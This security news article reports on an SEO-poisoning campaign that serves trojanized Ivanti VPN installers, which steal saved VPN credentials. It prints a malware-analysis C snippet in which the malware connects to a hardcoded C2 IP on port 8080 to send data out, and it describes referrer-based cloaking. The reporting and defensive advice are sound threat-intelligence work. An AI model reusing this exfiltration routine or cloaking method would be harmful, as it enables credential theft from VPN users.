An aggressive SEO poisoning campaign has surfaced in early October 2025, preying on users searching for the legitimate Ivanti Pulse Secure VPN client.
Attackers have registered lookalike domains such as ivanti-pulsesecure.com and ivanti-secure-access.org to host trojanized installers that appear official.
Unsuspecting victims clicking on top search results are redirected to these malicious sites, where a signed MSI file is offered for download under the guise of Ivanti’s Secure Access Client.
The trojanized installer carries a credential-stealing DLL, designed to harvest saved VPN connection details and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.
.webp "Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware 2")
Zscaler researchers noted a sophisticated referrer-based content delivery tactic used by the phishing domains. When accessed directly in a browser, the sites display benign content without any download links, evading quick detection by analysts and security scanners.
Only users arriving via search engine referrals—particularly from Bing—are shown the malicious download button, exploiting the HTTP Referrer header to cloak the true intent of the pages.
Once downloaded, the MSI installer drops two malicious DLLs—dwmapi.dll and pulseextension.dll—signed by a legitimate certificate authority to further bypass security controls.
.webp "Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware 4")
These DLLs embed a sequence of routines to locate and parse the Ivanti connection store (connectionstore.dat), extracting saved URIs and credentials.
Delving into the infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a network handshake with a hardcoded IP address in the Azure range (4.239.95.1) on port 8080.
The following C code snippet illustrates the socket setup and data exchange routine:-
WSADATA was;
WSAStartup(MAKEWORD(2,2), &wsa);
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_port = htons(8080);
inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr);
connect(sock, (struct sockaddr*)&addr, sizeof(addr));
// Receive 48 bytes
recv(sock, buf, 0x30, 0);
// XOR deobfuscation
for(int i=0;i<0x30;i++) buf[i]^=key[i];
// Send 52-byte obfuscated payload
send(sock, buf, 0x34, 0);.webp "Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware 5")
After the initial handshake and XOR-based deobfuscation routine, the malware transmits stolen VPN credentials in an HTTP POST request to the path /incomeshit, a colloquial label for exfiltration channels.
Because the IP resides within Microsoft Azure’s range, security teams may overlook these connections as benign cloud traffic.
By masquerading as trusted software and incorporating advanced evasion techniques, this campaign demonstrates the potency of search engine poisoning as an initial access vector.
Organizations should validate any Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate users on verifying official download sources.
Continuous threat hunting for referrer-based anomalies remains essential to thwarting these stealthy attacks.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
